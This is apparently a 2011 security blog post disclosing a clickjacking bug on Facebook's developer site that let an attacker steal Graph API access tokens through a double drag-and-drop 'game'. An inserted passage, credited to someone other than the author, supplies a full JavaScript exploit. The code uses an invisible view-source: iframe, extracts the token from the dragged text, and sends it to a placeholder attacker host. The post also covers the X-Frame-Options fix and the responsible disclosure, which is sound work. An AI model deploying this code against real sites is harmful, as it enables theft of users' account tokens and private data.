13. September 2011

Stealing Facebook Graph API Access Token - Yet Another UI Redressing Vector

I was going through developers.facebook.com and found that it allows itself to be IFramed. The site hosts all the documentation and examples for the Facebook Graph API and for other products such as the Legacy REST API, FQL and the Chat API. Once an attacker can put these pages in an IFrame, he can do a whole lot with them: any UI redressing attack that relies on the victim interacting with the framed page becomes possible.

I decided to write up one of the attacks this bug makes possible. As we all know, the documentation includes some really good examples of using the API, and those examples come with a ready-made access token issued for the currently logged-in user. This special token carries extended permissions such as read_stream, user_status, user_birthday, user_relationships and many more, which give access to data that even the user's normal friends can't see.

Stealing the Access Token :

Now the interesting part is getting at the token, which sits inside the page source. It can be stolen through many attack vectors; I decided to write a PoC using a double drag-and-drop technique that works on Firefox and IE. Google Chrome resists this attack because it disallows cross-domain drag and drop and also refuses to load view-source: URLs in an IFRAME.

Double Drag & Drop:

Here's the PoC, which uses view-source: to IFRAME the source code of the page containing the access token. It's better to use a double view-source: (view-source:view-source:...) so that everything renders as plain text and every link is disabled, leaving nothing clickable. The trick is to fool the user (any chicken will do) into playing a game in which he drags a ball into a trash can. I'll show some screenshots of what a real attack would look like. A video would have been better, but I'm just lazy sometimes.

The attacker asks the user to drag the ball into the basket
The attacker creates another ball and asks the user to repeat
The attacker asks the user to click Go to win the game

What really happened?

Here is what happened behind the scenes!

First drag: everything in the IFRAME gets selected

Second drag: the mighty cross-domain drag carries the selection out of the frame and onto the attacker's page

The user clicks Go and the source of the page, token included, is sent to the attacker

Here's the PoC code, which works on Firefox. Download Code
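Since the download is not reproduced here, below is an added sketch (my own, not the author's PoC) of how such a double drag-and-drop page is wired together: an invisible IFRAME loading the doubly view-source:-wrapped documentation page sits on top of the decoy ball, a visible basket outside the frame acts as the drop target, and Go exfiltrates whatever token was dragged out. DOC_URL, COLLECTOR_URL, the element ids, the frame geometry and the token regex are assumptions; SAMPLE_SOURCE is a constructed line of page source used only to exercise the extraction function.

```javascript
// Added example, not the author's downloadable PoC. Placeholders and
// assumptions are marked as such in the comments.

const DOC_URL = 'https://developers.facebook.com/docs/reference/api/'; // assumed docs page
const COLLECTOR_URL = 'https://attacker.example/collect';            // hypothetical attacker endpoint
const VIEW_SOURCE_DEPTH = 2; // "double view-source": plain text, no clickable links

// Assumed shape of the token inside the example URLs in the page source,
// e.g. "...?access_token=AAAB...&amp;method=get". '&' ends the token.
const TOKEN_RE = /access_token=([A-Za-z0-9_.|\-]+)/;

// Constructed sample of one line of page source (not real Facebook output).
const SAMPLE_SOURCE =
  '<a href="https://graph.facebook.com/me/feed?access_token=AAAB123|abc.def-xyz&amp;method=get">feed</a>';

// Stack `depth` view-source: prefixes in front of the URL.
function buildFrameSrc(url, depth) {
  return 'view-source:'.repeat(depth) + url;
}

// Pull the first access token out of the text dropped on the basket.
// Returns null when the selection held no token (e.g. victim not logged in).
function extractAccessToken(droppedText) {
  const m = TOKEN_RE.exec(droppedText);
  return m ? m[1] : null;
}

// Wire up the "game". Browser only; skipped when there is no DOM.
function setUpGame() {
  // Invisible frame stacked above the decoy ball. Mouse events reach the
  // framed text instead of the ball: the first drag selects the text, the
  // second drag (starting on the selection) carries it out of the frame.
  const frame = document.createElement('iframe');
  frame.src = buildFrameSrc(DOC_URL, VIEW_SOURCE_DEPTH);
  Object.assign(frame.style, {
    position: 'absolute', left: '0', top: '0',
    width: '800px', height: '600px', opacity: '0', zIndex: '10',
  });
  document.body.appendChild(frame);

  // The basket is a drop target in the top document, outside the frame's
  // box, so the drop event fires here with the cross-origin selection.
  const basket = document.getElementById('basket'); // assumed to exist in the page HTML
  const harvested = [];
  basket.addEventListener('dragover', (e) => e.preventDefault());
  basket.addEventListener('drop', (e) => {
    e.preventDefault();
    harvested.push(e.dataTransfer.getData('text/plain'));
  });

  // "Go": send the token home with a plain image request (no CORS needed).
  document.getElementById('go').addEventListener('click', () => { // 'go' button assumed in HTML
    const token = extractAccessToken(harvested.join('\n'));
    if (token) new Image().src = COLLECTOR_URL + '?t=' + encodeURIComponent(token);
  });
}

if (typeof document !== 'undefined') {
  document.addEventListener('DOMContentLoaded', setUpGame);
}
```

Everything hinges on the documentation page rendering inside a frame at all; a page that sends an X-Frame-Options header (DENY or SAMEORIGIN) is refused by the browser and neither drag can happen, which is the standard server-side fix for this whole class of attack.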

Response from Facebook Security:

I reported this bug to Facebook on August 28th, 2011, and the fix was up the very next day.